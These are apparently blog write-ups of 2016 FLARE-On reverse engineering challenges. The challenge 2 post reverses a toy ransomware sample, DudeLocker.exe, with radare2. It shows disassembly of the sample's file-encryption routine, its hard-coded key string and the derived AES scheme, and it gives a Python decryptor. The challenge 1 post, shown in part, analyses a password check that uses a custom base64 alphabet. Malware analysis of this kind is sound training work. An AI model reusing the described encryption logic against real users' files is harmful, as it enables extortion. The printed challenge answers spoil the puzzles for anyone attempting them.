Categotry Archives: Challenges

by

2016 FLARE-On Challenge 2

No comments yet

Categories: Challenges, Reverse Engineering

I didn’t get to spend a lot of time on the FLARE-On challenges this year, but I worked through the first 2 and used it as an opportunity to learn Radare2 a little better.

Here’s my solution to challenge 2.

$ md5 DudeLocker.exe BusinessPapers.doc
MD5 (DudeLocker.exe) = 4c262d5ab4bf8586d303bfa91a05b42b
MD5 (BusinessPapers.doc) = 857da52bdcaec6da473a59e2fe66df0a

Here is my r2 project file if you want to follow along with my notes. It should be unzipped in “.config/radare2/projects”, edit the challenge2 file and change the line “e file.path = /Users/yourname/challenge02/DudeLocker.exe” to the correct path for DudeLocker.exe, then open it with “r2 -p challenge2”.

Challenge 2 provides two files: an executable and a DOC based on the file extension. However, it appears the DOC has been encrypted. The challenge should be to decrypt this document file by reversing the method of encryption used by DudeLocker.exe.

$ file DudeLocker.exe BusinessPapers.doc
DudeLocker.exe:     PE32 executable for MS Windows (console) Intel 80386 32-bit
BusinessPapers.doc: data
$ xxd BusinessPapers.doc | head
00000000: 1bb9 6ebb 82c9 3d9a e290 fd8d c59a d40f  ..n...=.........
00000010: adb8 9376 511e 5f3a 37b5 d08a b5b8 02ae  ...vQ._:7.......
00000020: 503c 1926 676e 5ecd 48c4 3def d8ed 8ef1  P<.&gn^.H.=.....
00000030: 24af 5f4d 1c0c 7281 d583 a1a5 f729 5c2b  $._M..r......)\+

Running strings on the binary found a few interesting things. Obviously, it’s using a lot of Crypt* functions, which confirms its capabilities. There’s also JFIF, which could indicate a JPEG file, and there is a .JPG filename in the unicode strings. The unicode strings also show some things that may indicate anti-RE elements. Since OutputDebugString is imported, it could be that these are debug messages, rather than output directly to the console.

$ gstrings DudeLocker.exe  | more
...snip...
OutputDebugStringW
FindResourceW
...snip...
CryptAcquireContextW
CryptReleaseContext
CryptDeriveKey
CryptDestroyKey
CryptSetKeyParam
CryptGetKeyParam
CryptGetHashParam
CryptEncrypt
CryptCreateHash
CryptHashData
CryptDestroyHash
...snip...
JFIF
...snip...
$ gstrings -el DudeLocker.exe  | more
Briefcase
\ve_vant_ze_money.jpg
Obviously you're not a reverse engineer...
I'm out of my element

Looking at some info about the file in radare2, it looks like JFIF is in the .rsrc section, which would go along with the theory that it’s a JPEG stored in a resource.

$ r2 DudeLocker.exe
[0x00401b80]> aaaa
[0x00401b80]> izz~JFIF
vaddr=0x00404066 paddr=0x00001866 ordinal=075 sz=5 len=4 section=.rsrc type=ascii string=JFIF
[0x00401b80]> iS
[Sections]
idx=00 vaddr=0x00401000 paddr=0x00000400 sz=3072 vsz=2956 perm=m-r-x name=.text
idx=01 vaddr=0x00402000 paddr=0x00001000 sz=1536 vsz=1390 perm=m-r-- name=.rdata
idx=02 vaddr=0x00403000 paddr=0x00001600 sz=512 vsz=250 perm=m-rw- name=.data
idx=03 vaddr=0x00404000 paddr=0x00001800 sz=136192 vsz=135776 perm=m-r-- name=.rsrc

4 sections

Running the file, doesn’t produce any output. But if we run it with the Sysinternals DebugView open, we can see one of the output strings.

No output when run

DebugView shows debug string output

Radare puts us in the entry0 function, which is a small stub with a call to sub.SHELL32.dll_SHGetFolderPathW_9a0 based on the auto-analysis. We can go into thus function and get a quick overview of what it’s doing by looking at all the "calls" it makes.

[0x00401b80]> s sub.SHELL32.dll_SHGetFolderPathW_9a0
[0x004019a0]> pdf~call
│           0x004019e3      ff1594204000   call dword [sym.imp.SHELL32.dll_SHGetFolderPathW] ; "N%" @ 0x402094 ; get User Desktop path
│       │   0x004019f4      ff1538204000   call dword [sym.imp.KERNEL32.dll_lstrlenW] ; "x#" @ 0x402038
│       │   0x00401a1a      e8e1f5ffff     call sym.buildPathToBriefcase
│       │   0x00401a3b      ff1588204000   call dword [sym.imp.KERNEL32.dll_CreateFileW] ; sym.imp.KERNEL32.dll_CreateFileW
│      ││   0x00401a4e      ff1560204000   call dword [sym.imp.KERNEL32.dll_CloseHandle] ; "F#" @ 0x402060
│     │ │   0x00401a61      ff1540204000   call dword [sym.imp.KERNEL32.dll_OutputDebugStringW] ; sym.imp.KERNEL32.dll_OutputDebugStringW
│     └───> 0x00401a6e      e8cdf5ffff     call sym.checkVolumeSerialNumber ; compares SN to 0x7dab1d35
│     │││   0x00401a87      ff1540204000   call dword [sym.imp.KERNEL32.dll_OutputDebugStringW] ; sym.imp.KERNEL32.dll_OutputDebugStringW
│    │ ││   0x00401aa1      ff157c204000   call dword [sym.imp.KERNEL32.dll_GetProcessHeap] ; sym.imp.KERNEL32.dll_GetProcessHeap
│    │ ││   0x00401aa8      ff1584204000   call dword [sym.imp.KERNEL32.dll_HeapAlloc] ; sym.imp.KERNEL32.dll_HeapAlloc
│    │ ││   0x00401ac2      e879feffff     call sym.decryptKeyString   ; fills seedData
│    │ ││   0x00401ada      e8a1f5ffff     call sym.generateEncryptionKey
│   ││ ││   0x00401aff      e8fcf7ffff     call sym.encryptFilesInFolder
│   │││││   0x00401b1a      ff1534204000   call dword [sym.imp.KERNEL32.dll_lstrcatW] ; "l#" @ 0x402034
│   │││││   0x00401b27      e8f4f6ffff     call sym.writeRansomImage
│   │││││   0x00401b2f      e8bcfbffff     call sym.getVersion
│  ││││││   0x00401b44      e8d7fdffff     call sym.setParameterInfo
│   ││ ││   0x00401b52      ff157c204000   call dword [sym.imp.KERNEL32.dll_GetProcessHeap] ; sym.imp.KERNEL32.dll_GetProcessHeap
│   ││ ││   0x00401b59      ff1580204000   call dword [sym.imp.KERNEL32.dll_HeapFree] ; sym.imp.KERNEL32.dll_HeapFree
│   ││ ││   0x00401b67      e8e4f5ffff     call sym.cleanUpCrypto

This is after I had done my analysis on the file. The steps of the ransomware are as follows:

  1. Determine path to %USERPROFILE%\Desktop\Briefcase.
  2. If this folder doesn’t exist, print debug message “Obviously you’re not a reverse engineer…” and exit.
  3. Compare the hard drive serial number to 0x7dab1d35
  4. If the serial number doesn’t match, print debug message “I’m out of my element” and exit.
  5. Using the hard drive serial number, decrypt 37 bytes of data at 0x403000.
  6. Generate an AES encryption key using the above decrypted string.
  7. Encrypt each file in the folder.
  8. Write the JPEG resource to the “Briefcase” folder and set it as the Desktop wallpaper.

Step 5, where the byte array is decrypted does the following. It basically divides the counter by 4 and uses the remainder to choose one of the bytes of the volume serial number, then XORs the current byte in the string with that value.

│      ││   0x0040195f      8b5508         mov edx, dword [ebp + encryptedKeyString] ; [0x8:4]=4
│      ││   0x00401962      0355fc         add edx, dword [ebp - counter]
│      ││   0x00401965      0fb60a         movzx ecx, byte [edx]       ; get current byte
│      ││   0x00401968      8b45fc         mov eax, dword [ebp - counter]
│      ││   0x0040196b      33d2           xor edx, edx
│      ││   0x0040196d      be04000000     mov esi, 4
│      ││   0x00401972      f7f6           div esi                     ; divide counter by 4
│      ││   0x00401974      8b4510         mov eax, dword [ebp + volumeSerialNumber] ; [0x10:4]=184
│      ││   0x00401977      0fb61410       movzx edx, byte [eax + edx] ; select a byte from VSN based on remainder or division
│      ││   0x0040197b      33ca           xor ecx, edx                ; XOR current byte with above value
│      ││   0x0040197d      8b450c         mov eax, dword [ebp + seedData] ; [0xc:4]=0xffff
│      ││   0x00401980      0345fc         add eax, dword [ebp - counter]
│      ││   0x00401983      8808           mov byte [eax], cl          ; store result in seedData
│      └──< 0x00401985      ebc7           jmp sym.incrementCounter

The byte array below gets decrypted to “thosefilesreallytiedthefoldertogether” and is stored in “seedData”. I was going to write a Python version of this, but figured it would be much easier to just run DudeLocker.exe in a debugger and break right after the decryption function was called.

[0x00401940]> px 37 @  0x403000
- offset -   0 1  2 3  4 5  6 7  8 9  A B  C D  E F  0123456789ABCDEF
0x00403000, 4175 c40e 507b c211 506e d918 5471 c704  Au..P{..Pn..Tq..
0x00403010, 4174 ce19 4175 ce1b 5a71 cf18 4769 c41a  At..Au..Zq..Gi..
0x00403020, 5069 c318 47                             Pi..G

Before sym.decryptKeyString:

before decrypting

After sym.decryptKeyString:

after decrypting

In Step 6, the CBC mode AES key object is generated. This uses the SHA1 hash of the decrypted string to generate the key.

[0x00401580]> s sym.generateEncryptionKey
[0x00401080]> pdf~call
│           0x00401097      ff151c204000   call dword [sym.imp.ADVAPI32.dll_CryptAcquireContextW] ; "l$" @ 0x40201c
│       │   0x004010a1      ff1578204000   call dword [sym.imp.KERNEL32.dll_GetLastError] ; sym.imp.KERNEL32.dll_GetLastError
│      ││   0x004010ba      ff151c204000   call dword [sym.imp.ADVAPI32.dll_CryptAcquireContextW] ; "l$" @ 0x40201c
│    │ │    0x004010e5      e896000000     call sym.deriveAESKey
│    ││││   0x00401104      ff1518204000   call dword [sym.imp.ADVAPI32.dll_CryptReleaseContext] ; sym.imp.ADVAPI32.dll_CryptReleaseContext
│    │││    0x0040111c      ff150c204000   call dword [sym.imp.ADVAPI32.dll_CryptSetKeyParam] ; sym.imp.ADVAPI32.dll_CryptSetKeyParam
│    ││││   0x00401132      e819000000     call sym.cleanUpCrypto
[0x00401080]> s sym.generateEncryptionKey
[0x00401080]> pdf
╒ (fcn) sym.generateEncryptionKey 196
│   sym.generateEncryptionKey (int phKey, int phProv, int seedData, int seedDataLength);
│           ; var int cipher_mode_CBC @ ebp-0x4
│           ; arg int phKey @ ebp+0x8
│           ; arg int phProv @ ebp+0xc
│           ; arg int seedData @ ebp+0x10
│           ; arg int seedDataLength @ ebp+0x14
│           ; CALL XREF from 0x00401ada (sym.main_start)
│           0x00401080      55             push ebp
│           0x00401081      8bec           mov ebp, esp
│           0x00401083      51             push ecx
│           0x00401084      c745fc010000.  mov dword [ebp - cipher_mode_CBC], 1
│           0x0040108b      6a00           push 0
│           0x0040108d      6a18           push 0x18                   ; "@" ; PROV_RSA_AES
│           0x0040108f      6a00           push 0
│           0x00401091      6a00           push 0
│           0x00401093      8b450c         mov eax, dword [ebp + phProv] ; [0xc:4]=0xffff
│           0x00401096      50             push eax
│           0x00401097      ff151c204000   call dword [sym.imp.ADVAPI32.dll_CryptAcquireContextW] ; "l$" @ 0x40201c
...snip...
│   └───└─> 0x004010ce      8b5514         mov edx, dword [ebp + seedDataLength] ; [0x14:4]=0
│    │ │    0x004010d1      52             push edx
│    │ │    0x004010d2      8b4510         mov eax, dword [ebp + seedData] ; [0x10:4]=184
│    │ │    0x004010d5      50             push eax
│    │ │    0x004010d6      6810660000     push 0x6610                 ; CALG_AES_256
│    │ │    0x004010db      8b4d0c         mov ecx, dword [ebp + phProv] ; [0xc:4]=0xffff
│    │ │    0x004010de      8b11           mov edx, dword [ecx]
│    │ │    0x004010e0      52             push edx
│    │ │    0x004010e1      8b4508         mov eax, dword [ebp + phKey] ; [0x8:4]=4
│    │ │    0x004010e4      50             push eax
│    │ │    0x004010e5      e896000000     call sym.deriveAESKey
...snip...
│    │││└─> 0x0040110e      6a00           push 0
│    │││    0x00401110      8d55fc         lea edx, [ebp - cipher_mode_CBC]
│    │││    0x00401113      52             push edx
│    │││    0x00401114      6a04           push 4                      ; KP_MODE
│    │││    0x00401116      8b4508         mov eax, dword [ebp + phKey] ; [0x8:4]=4
│    │││    0x00401119      8b08           mov ecx, dword [eax]
│    │││    0x0040111b      51             push ecx
│    │││    0x0040111c      ff150c204000   call dword [sym.imp.ADVAPI32.dll_CryptSetKeyParam] ; sym.imp.ADVAPI32.dll_CryptSetKeyParam
...snip...

[0x00401080]> s sym.deriveAESKey
[0x00401180]> pdf~call
│       │   0x004011ac      ff1500204000   call dword [sym.imp.ADVAPI32.dll_CryptCreateHash] ; sym.imp.ADVAPI32.dll_CryptCreateHash
│    ││ │   0x004011d4      ff1520204000   call dword [sym.imp.ADVAPI32.dll_CryptHashData] ; sym.imp.ADVAPI32.dll_CryptHashData
│    ││││   0x004011e2      ff1524204000   call dword [sym.imp.ADVAPI32.dll_CryptDestroyHash] ; ",%" @ 0x402024
│   │││ │   0x004011ff      ff1514204000   call dword [sym.imp.ADVAPI32.dll_CryptDeriveKey] ; sym.imp.ADVAPI32.dll_CryptDeriveKey
│   │││ │   0x00401211      ff1524204000   call dword [sym.imp.ADVAPI32.dll_CryptDestroyHash] ; ",%" @ 0x402024
[0x00401180]> pdf
╒ (fcn) sym.deriveAESKey 158
│   sym.deriveAESKey (int encryptionKey, int pointerToCryptoServProv, int algId_AES256, int seedData, int seedDataLength);
│           ; var int hHash @ ebp-0x8
│           ; var int deriveSuccess @ ebp-0x1
│           ; var int local_0h @ ebp-0x0
│           ; arg int encryptionKey @ ebp+0x8
│           ; arg int pointerToCryptoServProv @ ebp+0xc
│           ; arg int algId_AES256 @ ebp+0x10
│           ; arg int seedData @ ebp+0x14
│           ; arg int seedDataLength @ ebp+0x18
│           ; CALL XREF from 0x004010e5 (sym.generateEncryptionKey)
│           0x00401180      55             push ebp
│           0x00401181      8bec           mov ebp, esp
│           0x00401183      83ec08         sub esp, 8
...snip...
|      └──> ;-- sym.createHash:
│      └──> 0x0040119b      8d45f8         lea eax, [ebp - hHash]
│       │   0x0040119e      50             push eax
│       │   0x0040119f      6a00           push 0
│       │   0x004011a1      6a00           push 0
│       │   0x004011a3      6804800000     push 0x8004                 ; CALG_SHA1
│       │   0x004011a8      8b4d0c         mov ecx, dword [ebp + pointerToCryptoServProv] ; [0xc:4]=0xffff
│       │   0x004011ab      51             push ecx
│       │   0x004011ac      ff1500204000   call dword [sym.imp.ADVAPI32.dll_CryptCreateHash] ; sym.imp.ADVAPI32.dll_CryptCreateHash
...snip...
|    ││└──> ;-- sym.hashSeedData:
│    ││└──> 0x004011c6      6a00           push 0
│    ││ │   0x004011c8      8b5518         mov edx, dword [ebp + seedDataLength] ; [0x18:4]=64 ; "@"
│    ││ │   0x004011cb      52             push edx
│    ││ │   0x004011cc      8b4514         mov eax, dword [ebp + seedData] ; [0x14:4]=0
│    ││ │   0x004011cf      50             push eax
│    ││ │   0x004011d0      8b4df8         mov ecx, dword [ebp - hHash]
│    ││ │   0x004011d3      51             push ecx
│    ││ │   0x004011d4      ff1520204000   call dword [sym.imp.ADVAPI32.dll_CryptHashData] ; sym.imp.ADVAPI32.dll_CryptHashData
...snip...
|   │││└──> ;-- sym.deriveKeyUsingHash:
│   │││└──> 0x004011ed      8b4508         mov eax, dword [ebp + encryptionKey] ; [0x8:4]=4
│   │││ │   0x004011f0      50             push eax
│   │││ │   0x004011f1      6a01           push 1                      ; CRYPT_EXPORTABLE
│   │││ │   0x004011f3      8b4df8         mov ecx, dword [ebp - hHash]
│   │││ │   0x004011f6      51             push ecx
│   │││ │   0x004011f7      8b5510         mov edx, dword [ebp + algId_AES256] ; [0x10:4]=184
│   │││ │   0x004011fa      52             push edx
│   │││ │   0x004011fb      8b450c         mov eax, dword [ebp + pointerToCryptoServProv] ; [0xc:4]=0xffff
│   │││ │   0x004011fe      50             push eax
│   │││ │   0x004011ff      ff1514204000   call dword [sym.imp.ADVAPI32.dll_CryptDeriveKey] ; sym.imp.ADVAPI32.dll_CryptDeriveKey

In Step 7, each file in the “Briefcase” folder is iterated over, and folders are entered recursively. For each file, the filename is converted to lowercase then from WideChar to MultiByte, then the MD5 of this format of the filename is taken. This MD5 hash is used as the initialization vector for encrypting the file.

│   ││└───> 0x00401af0      8d95c0fdffff   lea edx, [ebp - str_pathToBriefcase]
│   ││ ││   0x00401af6      52             push edx
│   ││ ││   0x00401af7      8d45ec         lea eax, [ebp - ptr_CryptoServiceProvider]
│   ││ ││   0x00401afa      50             push eax
│   ││ ││   0x00401afb      8d4de8         lea ecx, [ebp - encryptionKey]
│   ││ ││   0x00401afe      51             push ecx
│   ││ ││   0x00401aff      e8fcf7ffff     call sym.encryptFilesInFolder
[0x00401aa0]> s sym.encryptFilesInFolder
[0x00401300]> pdf~call
│           0x0040132b      ff1530204000   call dword [sym.imp.KERNEL32.dll_lstrcpyW] ; "`#" @ 0x402030
│           0x0040133c      ff1534204000   call dword [sym.imp.KERNEL32.dll_lstrcatW] ; "l#" @ 0x402034
│           0x00401350      ff154c204000   call dword [sym.imp.KERNEL32.dll_FindFirstFileW] ; sym.imp.KERNEL32.dll_FindFirstFileW
│     ││    0x00401379      ff1548204000   call dword [sym.imp.KERNEL32.dll_lstrcpynW] ; "T#" @ 0x402048
│     ││    0x00401394      e8f7050000     call sym.checkIfFolder      ; checks dwAttributes of FindFileData to indicate a directory
│    ││││   0x004013ca      e831fcffff     call sym.buildPathToBriefcase
│    ││││   0x004013e1      e81affffff     call sym.encryptFilesInFolder ; recursively encrypt files in subdirs
│   │ ││    0x00401403      e888050000     call sym.checkIfFolder
│   │ │││   0x00401428      e8d3fbffff     call sym.buildPathToBriefcase
│   │ │││   0x00401437      ff1538204000   call dword [sym.imp.KERNEL32.dll_lstrlenW] ; "x#" @ 0x402038
│   │ │││   0x0040144a      ff159c204000   call dword [sym.imp.USER32.dll_CharLowerW] ; ":$" @ 0x40209c
│   │ │││   0x00401456      ff157c204000   call dword [sym.imp.KERNEL32.dll_GetProcessHeap] ; sym.imp.KERNEL32.dll_GetProcessHeap
│   │ │││   0x0040145d      ff1584204000   call dword [sym.imp.KERNEL32.dll_HeapAlloc] ; sym.imp.KERNEL32.dll_HeapAlloc
│   │││││   0x00401474      e8b7020000     call sym.zeroOutBuffer
│   │ │││   0x00401497      ff155c204000   call dword [sym.imp.KERNEL32.dll_WideCharToMultiByte] ; sym.imp.KERNEL32.dll_WideCharToMultiByte
│   │ │││   0x004014ad      e8be020000     call sym.setIVToFilenameMD5
│   │││││   0x004014cb      e830000000     call sym.encryptFile
│ │   ││    0x004014e9      ff1550204000   call dword [sym.imp.KERNEL32.dll_FindNextFileW] ; sym.imp.KERNEL32.dll_FindNextFileW
[0x00401500]> s sym.setIVToFilenameMD5
[0x00401770]> pdf~call
│           0x0040179d      ff1508204000   call dword [sym.imp.ADVAPI32.dll_CryptGetKeyParam] ; sym.imp.ADVAPI32.dll_CryptGetKeyParam ; get block length in bits
│       │   0x004017b3      e898f9ffff     call sym.cleanUpCrypto
│      │    0x004017d1      ff157c204000   call dword [sym.imp.KERNEL32.dll_GetProcessHeap] ; sym.imp.KERNEL32.dll_GetProcessHeap
│      │    0x004017d8      ff1584204000   call dword [sym.imp.KERNEL32.dll_HeapAlloc] ; sym.imp.KERNEL32.dll_HeapAlloc
│      ││   0x004017f7      e854f9ffff     call sym.cleanUpCrypto
│     ││    0x00401810      e81bffffff     call sym.zeroOutBuffer
│     ││    0x0040182b      ff1500204000   call dword [sym.imp.ADVAPI32.dll_CryptCreateHash] ; sym.imp.ADVAPI32.dll_CryptCreateHash
│   ││││    0x00401887      ff1520204000   call dword [sym.imp.ADVAPI32.dll_CryptHashData] ; sym.imp.ADVAPI32.dll_CryptHashData
│   │││││   0x00401895      ff1524204000   call dword [sym.imp.ADVAPI32.dll_CryptDestroyHash] ; ",%" @ 0x402024
│  │││││    0x004018b8      ff1504204000   call dword [sym.imp.ADVAPI32.dll_CryptGetHashParam] ; sym.imp.ADVAPI32.dll_CryptGetHashParam
│ ││││││    0x004018d6      ff150c204000   call dword [sym.imp.ADVAPI32.dll_CryptSetKeyParam] ; sym.imp.ADVAPI32.dll_CryptSetKeyParam
│ │││││││   0x004018e8      ff157c204000   call dword [sym.imp.KERNEL32.dll_GetProcessHeap] ; sym.imp.KERNEL32.dll_GetProcessHeap
│ │││││││   0x004018ef      ff1580204000   call dword [sym.imp.KERNEL32.dll_HeapFree] ; sym.imp.KERNEL32.dll_HeapFree
│ │││││││   0x00401901      e84af8ffff     call sym.cleanUpCrypto
│ ││││││    0x00401911      ff1524204000   call dword [sym.imp.ADVAPI32.dll_CryptDestroyHash] ; ",%" @ 0x402024
[0x00401770]> s sym.encryptFile
[0x00401500]> pdf~call
│           0x0040153f      ff1508204000   call dword [sym.imp.ADVAPI32.dll_CryptGetKeyParam] ; sym.imp.ADVAPI32.dll_CryptGetKeyParam ; getBlockLength
│       │   0x00401555      e8f6fbffff     call sym.cleanUpCrypto
│      │    0x004015ae      ff1588204000   call dword [sym.imp.KERNEL32.dll_CreateFileW] ; sym.imp.KERNEL32.dll_CreateFileW
│     ││    0x004015ca      ff156c204000   call dword [sym.imp.KERNEL32.dll_GetFileSize] ; " #" @ 0x40206c
│    │││    0x004015f4      ff1588204000   call dword [sym.imp.KERNEL32.dll_CreateFileW] ; sym.imp.KERNEL32.dll_CreateFileW
│   ││││    0x00401611      ff157c204000   call dword [sym.imp.KERNEL32.dll_GetProcessHeap] ; sym.imp.KERNEL32.dll_GetProcessHeap
│   ││││    0x00401618      ff1584204000   call dword [sym.imp.KERNEL32.dll_HeapAlloc] ; sym.imp.KERNEL32.dll_HeapAlloc
│  ││││││   0x0040163f      ff1564204000   call dword [sym.imp.KERNEL32.dll_ReadFile] ; ":#" @ 0x402064
│  ││││││   0x00401672      ff1528204000   call dword [sym.imp.ADVAPI32.dll_CryptEncrypt] ; sym.imp.ADVAPI32.dll_CryptEncrypt
│  ││││││   0x00401690      ff1568204000   call dword [sym.imp.KERNEL32.dll_WriteFile] ; ".#" @ 0x402068
│     │││   0x004016b2      ff1560204000   call dword [sym.imp.KERNEL32.dll_CloseHandle] ; "F#" @ 0x402060
│     │││   0x004016c2      ff1560204000   call dword [sym.imp.KERNEL32.dll_CloseHandle] ; "F#" @ 0x402060
│     │││   0x004016d4      ff157c204000   call dword [sym.imp.KERNEL32.dll_GetProcessHeap] ; sym.imp.KERNEL32.dll_GetProcessHeap
│     │││   0x004016db      ff1580204000   call dword [sym.imp.KERNEL32.dll_HeapFree] ; sym.imp.KERNEL32.dll_HeapFree

Step 8 writes the following image to “Briefcase” and sets it as the Desktop wallpaper:

ransom note

This level of analysis was overkill for this challenge, but I wanted to get more practice with Radare2, so I tried to document everything I could in the EXE since it was pretty straightforward. In the end, to do the decryption, we need to create an AES key using the SHA1 hash of “thosefilesreallytiedthefoldertogether” as the shared secret and the MD5 hash of the lowercase of the filename as the initialization vector.

I tried using the built in python Cipher libraries, but they only support a key length of 16, 24, and 32 bytes, and a SHA1 hash is 20 bytes. I found the wincrypto library. The builtin decrypt function uses an IV = ‘\0’ * 16 so I had to call it manually. This was the python script I ended up using.

#!/usr/bin/python

from Crypto.Cipher import AES
from wincrypto import CryptCreateHash, CryptHashData, CryptDeriveKey
from wincrypto.constants import CALG_SHA1, CALG_AES_256
import hashlib
import binascii
import sys

# read in the file
filename = sys.argv[1]
f = open(filename, 'r')
data_enc = f.read()

# decrypt the secret used for the AES key
key_str_enc = "4175c40e507bc211506ed9185471c7044174ce194175ce1b5a71cf184769c41a5069c31847"
key_str_enc = binascii.a2b_hex(key_str_enc)
vsn = "351dab7d"
vsn = binascii.a2b_hex(vsn)
key_str_dec = ""

# divide the counter by 4 and use the remainder to determine which byte of the VSN to use for XOR
for i in range(0, len(key_str_enc)):
    remain = (i % 4)
    key_str_dec += chr(ord(key_str_enc[i]) ^ ord(vsn[remain]))

# hash secret and create the key
sha1_hasher = CryptCreateHash(CALG_SHA1)
CryptHashData(sha1_hasher, key_str_dec)
aes_key = CryptDeriveKey(sha1_hasher, CALG_AES_256)

# get the hash of the filename to create the IV
m = hashlib.md5()
m.update(filename.lower())
iv = m.hexdigest()
iv = binascii.a2b_hex(iv)

# decrypt the file data
data_dec = AES.new(aes_key.key, mode=AES.MODE_CBC, IV=iv).decrypt(data_enc)

# write out the file
fo = open(filename + ".out", 'wb')
fo.write(data_dec)
fo.close()
$ python DudeUnlocker.py BusinessPapers.doc
$ file BusinessPapers.doc*
BusinessPapers.doc:     data
BusinessPapers.doc.out: JPEG image data, JFIF standard 1.01

challenge 2 answer

I was going to share my radare2 project file, but somehow it got corrupted and lost all my work. Luckily, I had r2 open in another window and was able to save a working copy of the project from that one. Definitely learned to make backup copies based on this experience. Also, don’t hit Ctrl-D to exit out. It wrecks the project file.

by

2016 FLARE-On Challenge 1

No comments yet

Categories: Challenges, Reverse Engineering

I didn’t get to spend a lot of time on the FLARE-On challenges this year, but I worked through the first 2 and used it as an opportunity to learn Radare2 a little better.

Here’s my solution to challenge 1.

$ md5 challenge1.exe
MD5 (challenge1.exe) = 2caaa4aa5923d026b17d7b38ee410918

I ran strings on the file to see if there was anything interesting. The ones below stood out.

$ gstrings -n 48 challenge1.exe

x2dtJEOmyjacxDemx2eczT5cVS9fVUGvWTuZWjuexjRqy24rV29q
Enter password:
Correct!
Wrong password

ZYXABCDEFGHIJKLMNOPQRSTUVWzyxabcdefghijklmnopqrstuvw0123456789+/

It looks like the program prompts for a password and will output whether it was correct. The first string looks like some encoded data. We might first guess it’s base64 encoded, but, not so much:

$ echo "x2dtJEOmyjacxDemx2eczT5cVS9fVUGvWTuZWjuexjRqy24rV29q" | base64 -D
�gm$C��6��7��g��>\U/_UA�Y;�Z;��4j�n+Woj

However, that last string is interesting. It looks like all the characters in a typical base64 alphabet, but it starts with XYZ instead of ABC, so it looks like this may be base64 using a custom alphabet.

Before testing that, I did take a look at the file in radare2, since like I mentioned in the summary, I wanted to use these challenges as a way to learn radare. There may be better ways to do what I was doing, and I’m definitely open to suggestions.

$ r2 challenge1.exe
[0x0040170d]> aaaa
[0x0040170d]> s sym.main
[0x00000000]> pdf
Cannot find function at 0x00000000

Typically, after analyzing, I run “s sym.main” but it wasn’t found with the analysis. I knew the output strings would be near the important code, so I ran:

$ r2 challenge1.exe
[0x0040170d]> aaaa
[0x0000bfac]> s/ Correct
Searching 7 bytes from 0x0000bfad to 0x00417e64: 43 6f 72 72 65 63 74
Searching 7 bytes in [0xbfad-0x417e64]
hits: 1  hit1_0 .. hit1_0
0x0040d1ac hit1_0 .r password:Correct!Wrong passw.
[0x0040d1ac]> pd 20
;-- str.Correct__r_n:
; DATA XREF from 0x004014ae (sub.KERNEL32.dll_GetStdHandle_420)
0x0040d1ac     .string "Correct!\\r\\n" ; len=11

[0x0040d1ac]> s 0x4014ae
[0x004014ae]> pd 10
│           0x004014ae      68acd14000     push str.Correct__r_n ; str.Correct__r_n ; "Correct!.." @ 0x40d1ac
│           0x004014b3      8b4df8         mov ecx, dword [ebp - local_8h]
│           0x004014b6      51             push ecx
│           0x004014b7      ff15a0d04000   call dword [sym.imp.KERNEL32.dll_WriteFile] ; sym.imp.KERNEL32.dll_WriteFile
│       ┌─< 0x004014bd      eb17           jmp 0x4014d6
│       │   0x004014bf      6a00           push 0
│       │   0x004014c1      8d55fc         lea edx, [ebp - local_4h]
│       │   0x004014c4      52             push edx
│       │   0x004014c5      6a11           push 0x11
│       │   0x004014c7      68b8d14000     push str.Wrong_password_r_n ; str.Wrong_password_r_n ; "Wrong password.." @ 0x40d1b8
[0x004014ae]> s sub.KERNEL32.dll_GetStdHandle_420
[0x00401420]> pdf
╒ (fcn) sub.KERNEL32.dll_GetStdHandle_420 188
│   sub.KERNEL32.dll_GetStdHandle_420 ();
│           ; var int local_94h @ ebp-0x94
│           ; var int local_14h @ ebp-0x14
│           ; var int local_10h @ ebp-0x10
│           ; var int local_ch @ ebp-0xc
│           ; var int local_8h @ ebp-0x8
│           ; var int local_4h @ ebp-0x4
│           ; CALL XREF from 0x0040168b (entry0)
│           0x00401420      55             push ebp
│           0x00401421      8bec           mov ebp, esp
│           0x00401423      81ec94000000   sub esp, 0x94
│           0x00401429      6af5           push -0xb
│           0x0040142b      ff1510d14000   call dword [sym.imp.KERNEL32.dll_GetStdHandle] ; sym.imp.KERNEL32.dll_GetStdHandle
│           0x00401431      8945f8         mov dword [ebp - local_8h], eax

So this looks like the function we want. I switched over to visual mode to get a look at the control flow by entering “VV” on the console and hitting enter, then hitting “p” until I got to the BB-SUMM screen:

[0x00401420]> VV @ sub.KERNEL32.dll_GetStdHandle_420 (nodes 4 edges 4 zoom 100%) BB-SUMM mouse:canvas-y movements-speed:5



                             =------------------------------------------------------------=
                             | [0x401420]                                                 |
                             | 0x0040142b call dword [sym.imp.KERNEL32.dll_GetStdHandle]  |
                             | 0x00401436 call dword [sym.imp.KERNEL32.dll_GetStdHandle]  |
                             | 0x0040144e str.Enter_password:_r_n                         |
                             | 0x00401457 call dword [sym.imp.KERNEL32.dll_WriteFile]     |
                             | 0x00401473 call dword [sym.imp.KERNEL32.dll_ReadFile]      |
                             | 0x00401487 call fcn.00401260                               |
                             | 0x0040149a call fcn.00402c30                               |
                             =------------------------------------------------------------=
                                   t f
     .-----------------------------' '---------------------------------.
     |                                                                 |
     |                                                                 |
---------------------------------------------------------=     =---------------------------------------------------------=
  0x4014bf                                               |     |  0x4014a6                                               |
 0x004014c7 str.Wrong_password_r_n                       |     | 0x004014ae str.Correct__r_n                             |
 0x004014d0 call dword [sym.imp.KERNEL32.dll_WriteFile]  |     | 0x004014b7 call dword [sym.imp.KERNEL32.dll_WriteFile]  |
---------------------------------------------------------=     =---------------------------------------------------------=
   v                                                               v
   '-------------------------------------------------.-------------'
                                                     |
                                                     |
                                                 =--------------------=
                                                 |  0x4014d6          |
                                                 =--------------------=

It looks like handles to STDIN and STDOUT are created, the prompt is printed, input is read, and then processed in the two calls to determine if it was successful or not.

I looked over the code and determined the argument passed in (arg_ch) was the password length, which was divided by 3 and multiplied by 4 (because every 3 ASCII characters turn into 4 characters in the base64 output). The base64 alphabet from the strings output is also referenced a lot in this function, so that pretty much confirmed what was going on.

[0x00401420]> s 0x401260
[0x00401260]> pdf
╒ (fcn) fcn.00401260 448
│   fcn.00401260 (int arg_8h, int arg_ch);
│           ; CALL XREF from 0x00401487 (sub.KERNEL32.dll_GetStdHandle_420)
│           0x00401260      55             push ebp
│           0x00401261      8bec           mov ebp, esp
│           0x00401263      83ec30         sub esp, 0x30               ; '0'
│           0x00401266      8b450c         mov eax, dword [ebp + arg_ch] ; [0xc:4]=0xffff
│           0x00401269      83c002         add eax, 2
│           0x0040126c      33d2           xor edx, edx
│           0x0040126e      b903000000     mov ecx, 3
│           0x00401273      f7f1           div ecx
